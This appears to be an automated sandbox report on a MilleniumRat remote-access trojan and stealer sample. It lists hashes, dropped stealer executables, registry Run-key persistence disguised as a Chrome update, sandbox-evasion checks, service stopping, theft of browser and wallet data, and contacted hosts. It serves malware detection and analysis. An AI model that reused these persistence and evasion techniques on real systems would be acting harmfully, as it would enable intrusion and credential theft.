milleniumrat | f4409a46a0cca24cb547a077191891f8837a3aa91ad53ef77b59c97c2cf4ca15

Analysis

max time kernel
85s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
11-05-2024 03:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6d5ba38a5e9bde7939ac5dcb8fdcb970701168064d30abcf518cf8d272a0f581.exe
Size

44.1MB
MD5

e4897ef7419e128b1f7473119ce0bd07
SHA1

5aad252412a5923438f30cb9c397731a9b020121
SHA256

6d5ba38a5e9bde7939ac5dcb8fdcb970701168064d30abcf518cf8d272a0f581
SHA512

db66ea2cb3f5f30934ab071e1dd2e7b41f6dc5c4be125f1d2d6aab627b3be8b6cf8fcbed517a414cdf037a068414b178176edba2e28de6419b65269e0abb162c
SSDEEP

786432:NCZkrrfdktmLX8t8lBBvUPlZIOPuOI64zlNWtVMoOIsuXzfVib4a9BWN:N4GlkcLMtUzilKUINzmtVkMfWo

Score

10^/10

milleniumrat discovery evasion execution persistence pyinstaller rat spyware stealer upx

Malware Config

Signatures

MilleniumRat
MilleniumRat is a remote access trojan written in C#.
rat stealer milleniumrat
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

Processes:

WerFault.exe

description pid process target process

PID 10872 created 1020 10872 WerFault.exe dwm.exe

description	pid	process	target process
PID 10872 created 1020	10872	WerFault.exe	dwm.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs

Processes:

setup.exeupdater.exesvchost.exe

description	pid	process	target process
PID 5764 created 3556	5764	setup.exe	Explorer.EXE
PID 5764 created 3556	5764	setup.exe	Explorer.EXE
PID 5764 created 3556	5764	setup.exe	Explorer.EXE
PID 5764 created 3556	5764	setup.exe	Explorer.EXE
PID 5764 created 3556	5764	setup.exe	Explorer.EXE
PID 5764 created 3556	5764	setup.exe	Explorer.EXE
PID 7864 created 3556	7864	updater.exe	Explorer.EXE
PID 7864 created 3556	7864	updater.exe	Explorer.EXE
PID 7864 created 3556	7864	updater.exe	Explorer.EXE
PID 7864 created 3556	7864	updater.exe	Explorer.EXE
PID 7864 created 3556	7864	updater.exe	Explorer.EXE
PID 12544 created 1020	12544	svchost.exe	dwm.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

3232 powershell.exe
7020 powershell.exe
6184 powershell.exe
2420 powershell.exe
5356 powershell.exe
Contacts a large (1167) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

pid	process
3232	powershell.exe
7020	powershell.exe
6184	powershell.exe
2420	powershell.exe
5356	powershell.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

6d5ba38a5e9bde7939ac5dcb8fdcb970701168064d30abcf518cf8d272a0f581.exeBuild.exes.exemain.exeUpdate.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	6d5ba38a5e9bde7939ac5dcb8fdcb970701168064d30abcf518cf8d272a0f581.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	Build.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	s.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	main.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	Update.exe

Executes dropped EXE 64 IoCs

Processes:

cstealer.execstealer.execstealer.execstealer.execstealer.execstealer.execstealer.execstealer.execstealer.execstealer.exemain.exemain.execstealer.execstealer.exeBuild.execstealer.execstealer.execstealer.execstealer.execstealer.exehacn.execstealer.exebased.exehacn.exebased.execstealer.exes.execstealer.execstealer.execstealer.exemain.exesvchost.exesetup.execstealer.exesvchost.execstealer.execstealer.execstealer.execstealer.execstealer.execstealer.execstealer.execstealer.execstealer.execstealer.execstealer.execstealer.execstealer.exerar.execstealer.execstealer.execstealer.execstealer.execstealer.execstealer.execstealer.exeUpdate.execstealer.execstealer.execstealer.execstealer.execstealer.execstealer.execstealer.exe

pid	process
3548	cstealer.exe
2256	cstealer.exe
4600	cstealer.exe
2404	cstealer.exe
4156	cstealer.exe
372	cstealer.exe
4720	cstealer.exe
1304	cstealer.exe
1240	cstealer.exe
5032	cstealer.exe
4852	main.exe
3712	main.exe
740	cstealer.exe
3640	cstealer.exe
4552	Build.exe
3424	cstealer.exe
1620	cstealer.exe
1716	cstealer.exe
3284	cstealer.exe
3964	cstealer.exe
4232	hacn.exe
1456	cstealer.exe
2676	based.exe
3076	hacn.exe
5012	based.exe
4184	cstealer.exe
2688	s.exe
5024	cstealer.exe
3344	cstealer.exe
2324	cstealer.exe
2948	main.exe
5256	svchost.exe
5764	setup.exe
5904	cstealer.exe
5952	svchost.exe
1348	cstealer.exe
7264	cstealer.exe
7420	cstealer.exe
7712	cstealer.exe
7888	cstealer.exe
6828	cstealer.exe
8228	cstealer.exe
8300	cstealer.exe
8408	cstealer.exe
6716	cstealer.exe
8868	cstealer.exe
9200	cstealer.exe
6040	cstealer.exe
6184	rar.exe
6360	cstealer.exe
6456	cstealer.exe
7064	cstealer.exe
6760	cstealer.exe
6640	cstealer.exe
5660	cstealer.exe
5220	cstealer.exe
7468	Update.exe
7672	cstealer.exe
7944	cstealer.exe
8136	cstealer.exe
5844	cstealer.exe
5620	cstealer.exe
5760	cstealer.exe
2396	cstealer.exe

Loads dropped DLL 64 IoCs

Processes:

cstealer.execstealer.execstealer.execstealer.exe

pid	process
2256	cstealer.exe
2256	cstealer.exe
2256	cstealer.exe
2256	cstealer.exe
2256	cstealer.exe
2256	cstealer.exe
2256	cstealer.exe
2256	cstealer.exe
2256	cstealer.exe
2256	cstealer.exe
2256	cstealer.exe
2256	cstealer.exe
2256	cstealer.exe
2256	cstealer.exe
2256	cstealer.exe
2256	cstealer.exe
2256	cstealer.exe
2256	cstealer.exe
2256	cstealer.exe
2404	cstealer.exe
2404	cstealer.exe
2404	cstealer.exe
2404	cstealer.exe
2404	cstealer.exe
2404	cstealer.exe
2404	cstealer.exe
2404	cstealer.exe
2404	cstealer.exe
2404	cstealer.exe
2404	cstealer.exe
2404	cstealer.exe
2404	cstealer.exe
2404	cstealer.exe
2404	cstealer.exe
2404	cstealer.exe
2404	cstealer.exe
2404	cstealer.exe
2404	cstealer.exe
372	cstealer.exe
372	cstealer.exe
372	cstealer.exe
372	cstealer.exe
372	cstealer.exe
372	cstealer.exe
372	cstealer.exe
372	cstealer.exe
372	cstealer.exe
372	cstealer.exe
372	cstealer.exe
372	cstealer.exe
372	cstealer.exe
372	cstealer.exe
372	cstealer.exe
372	cstealer.exe
372	cstealer.exe
372	cstealer.exe
372	cstealer.exe
1304	cstealer.exe
1304	cstealer.exe
1304	cstealer.exe
1304	cstealer.exe
1304	cstealer.exe
1304	cstealer.exe
1304	cstealer.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 37 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/3712-197-0x00007FF8E3B90000-0x00007FF8E4178000-memory.dmp	upx
behavioral2/memory/3712-221-0x00007FF8E3B90000-0x00007FF8E4178000-memory.dmp	upx
behavioral2/memory/5012-335-0x00007FF8EB570000-0x00007FF8EBB58000-memory.dmp	upx
behavioral2/memory/5012-336-0x00007FF8EAF50000-0x00007FF8EAF74000-memory.dmp	upx
behavioral2/memory/5012-337-0x00007FF8EADD0000-0x00007FF8EADDF000-memory.dmp	upx
behavioral2/memory/5012-363-0x00007FF8E7020000-0x00007FF8E704D000-memory.dmp	upx
behavioral2/memory/5012-366-0x00007FF8E5200000-0x00007FF8E5373000-memory.dmp	upx
behavioral2/memory/5012-368-0x00007FF8E73C0000-0x00007FF8E73CD000-memory.dmp	upx
behavioral2/memory/5012-367-0x00007FF8E6EA0000-0x00007FF8E6EB9000-memory.dmp	upx
behavioral2/memory/5012-370-0x00007FF8E6A30000-0x00007FF8E6AE8000-memory.dmp	upx
behavioral2/memory/5012-369-0x00007FF8E6E70000-0x00007FF8E6E9E000-memory.dmp	upx
behavioral2/memory/5012-372-0x00007FF8E3C90000-0x00007FF8E4005000-memory.dmp	upx
behavioral2/memory/5012-365-0x00007FF8E6EE0000-0x00007FF8E6F03000-memory.dmp	upx
behavioral2/memory/5012-364-0x00007FF8E7000000-0x00007FF8E7019000-memory.dmp	upx
behavioral2/memory/5012-379-0x00007FF8E50E0000-0x00007FF8E51FC000-memory.dmp	upx
behavioral2/memory/5012-380-0x00007FF8E6FF0000-0x00007FF8E6FFD000-memory.dmp	upx
behavioral2/memory/5012-378-0x00007FF8E6E50000-0x00007FF8E6E64000-memory.dmp	upx
behavioral2/memory/5012-377-0x00007FF8EB570000-0x00007FF8EBB58000-memory.dmp	upx
behavioral2/memory/5012-1975-0x00007FF8EAF50000-0x00007FF8EAF74000-memory.dmp	upx
behavioral2/memory/5012-2625-0x00007FF8E5200000-0x00007FF8E5373000-memory.dmp	upx
behavioral2/memory/5012-2623-0x00007FF8E6EE0000-0x00007FF8E6F03000-memory.dmp	upx
behavioral2/memory/5012-2833-0x00007FF8E6EA0000-0x00007FF8E6EB9000-memory.dmp	upx
behavioral2/memory/5012-3870-0x00007FF8E50E0000-0x00007FF8E51FC000-memory.dmp	upx
behavioral2/memory/5012-3876-0x00007FF8EB570000-0x00007FF8EBB58000-memory.dmp	upx
behavioral2/memory/5012-3869-0x00007FF8E6E50000-0x00007FF8E6E64000-memory.dmp	upx
behavioral2/memory/5012-3868-0x00007FF8E6A30000-0x00007FF8E6AE8000-memory.dmp	upx
behavioral2/memory/5012-3867-0x00007FF8E6FF0000-0x00007FF8E6FFD000-memory.dmp	upx
behavioral2/memory/5012-3866-0x00007FF8E6E70000-0x00007FF8E6E9E000-memory.dmp	upx
behavioral2/memory/5012-3865-0x00007FF8E73C0000-0x00007FF8E73CD000-memory.dmp	upx
behavioral2/memory/5012-3864-0x00007FF8E6EA0000-0x00007FF8E6EB9000-memory.dmp	upx
behavioral2/memory/5012-3863-0x00007FF8E5200000-0x00007FF8E5373000-memory.dmp	upx
behavioral2/memory/5012-3859-0x00007FF8E6EE0000-0x00007FF8E6F03000-memory.dmp	upx
behavioral2/memory/5012-3858-0x00007FF8E7000000-0x00007FF8E7019000-memory.dmp	upx
behavioral2/memory/5012-3857-0x00007FF8E7020000-0x00007FF8E704D000-memory.dmp	upx
behavioral2/memory/5012-3856-0x00007FF8EADD0000-0x00007FF8EADDF000-memory.dmp	upx
behavioral2/memory/5012-3854-0x00007FF8EAF50000-0x00007FF8EAF74000-memory.dmp	upx
behavioral2/memory/5012-3853-0x00007FF8E3C90000-0x00007FF8E4005000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

svchost.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\кокершмидт = "C:\\ProgramData\\svchost.exe"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLog\\Update.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service
T1102

Processes:

flow ioc

21 raw.githubusercontent.com
24 raw.githubusercontent.com
90 raw.githubusercontent.com
93 discord.com
95 discord.com
20 raw.githubusercontent.com
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

17 ip-api.com
29 api.ipify.org
30 api.ipify.org

flow	ioc
21	raw.githubusercontent.com
24	raw.githubusercontent.com
90	raw.githubusercontent.com
93	discord.com
95	discord.com
20	raw.githubusercontent.com

flow	ioc
17	ip-api.com
29	api.ipify.org
30	api.ipify.org

Drops file in System32 directory 4 IoCs

Processes:

svchost.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

svchost.exe

pid process

5952 svchost.exe

pid	process
5952	svchost.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

setup.exeupdater.exe

description	pid	process	target process
PID 5764 set thread context of 7816	5764	setup.exe	dialer.exe
PID 7864 set thread context of 11108	7864	updater.exe	dialer.exe
PID 7864 set thread context of 12028	7864	updater.exe	dialer.exe
PID 7864 set thread context of 12600	7864	updater.exe	dialer.exe

Drops file in Program Files directory 1 IoCs

Processes:

setup.exe

description ioc process

File created C:\Program Files\Google\Chrome\updater.exe setup.exe
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

5688 sc.exe
7428 sc.exe
10332 sc.exe
7480 sc.exe
1876 sc.exe
5000 sc.exe
10412 sc.exe
10512 sc.exe
10732 sc.exe
10792 sc.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	setup.exe

pid	process
5688	sc.exe
7428	sc.exe
10332	sc.exe
7480	sc.exe
1876	sc.exe
5000	sc.exe
10412	sc.exe
10512	sc.exe
10732	sc.exe
10792	sc.exe

Detects Pyinstaller 4 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\cstealer.exe	pyinstaller
C:\Users\Admin\AppData\Local\Temp\main.exe	pyinstaller
C:\ProgramData\Microsoft\hacn.exe	pyinstaller
C:\ProgramData\svchost.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

dwm.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	dwm.exe

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Update.exeWerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Update.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Update.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

7724 schtasks.exe
11480 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

6436 timeout.exe
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

7456 WMIC.exe
Enumerates processes with tasklist 1 TTPs 4 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exe

pid process

4456 tasklist.exe
3496 tasklist.exe
6048 tasklist.exe
5184 tasklist.exe

pid	process
7724	schtasks.exe
11480	schtasks.exe

pid	process
6436	timeout.exe

pid	process
7456	WMIC.exe

pid	process
4456	tasklist.exe
3496	tasklist.exe
6048	tasklist.exe
5184	tasklist.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

dwm.exeWerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	dwm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	dwm.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

5924 systeminfo.exe

pid	process
5924	systeminfo.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exedwm.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft	dwm.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	dwm.exe

Modifies registry class 4 IoCs

Processes:

RuntimeBroker.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp	RuntimeBroker.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

8836 reg.exe

pid	process
8836	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exemain.exepowershell.exepowershell.exepowershell.exepowershell.exeUpdate.exe

pid	process
2420	powershell.exe
2420	powershell.exe
5244	powershell.exe
5244	powershell.exe
5356	powershell.exe
5356	powershell.exe
5820	powershell.exe
5820	powershell.exe
2420	powershell.exe
2420	powershell.exe
3232	powershell.exe
3232	powershell.exe
5244	powershell.exe
5244	powershell.exe
5820	powershell.exe
3232	powershell.exe
2948	main.exe
2948	main.exe
2948	main.exe
2948	main.exe
2948	main.exe
2948	main.exe
2948	main.exe
2948	main.exe
2948	main.exe
2948	main.exe
2948	main.exe
2948	main.exe
2948	main.exe
2948	main.exe
2948	main.exe
2948	main.exe
2948	main.exe
2948	main.exe
2948	main.exe
2948	main.exe
5356	powershell.exe
8780	powershell.exe
8780	powershell.exe
8780	powershell.exe
9028	powershell.exe
9028	powershell.exe
9028	powershell.exe
7184	powershell.exe
7184	powershell.exe
7184	powershell.exe
7772	powershell.exe
7772	powershell.exe
7772	powershell.exe
7468	Update.exe
7468	Update.exe
7468	Update.exe
7468	Update.exe
7468	Update.exe
7468	Update.exe
7468	Update.exe
7468	Update.exe
7468	Update.exe
7468	Update.exe
7468	Update.exe
7468	Update.exe
7468	Update.exe
7468	Update.exe
7468	Update.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3556 Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

tasklist.exetasklist.exemain.exepowershell.exepowershell.exepowershell.exeWMIC.exetasklist.exepowershell.exepowershell.exepowershell.exepowershell.exetasklist.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	4456	tasklist.exe
Token: SeDebugPrivilege	3496	tasklist.exe
Token: SeDebugPrivilege	2948	main.exe
Token: SeDebugPrivilege	2420	powershell.exe
Token: SeDebugPrivilege	5244	powershell.exe
Token: SeDebugPrivilege	5356	powershell.exe
Token: SeIncreaseQuotaPrivilege	6016	WMIC.exe
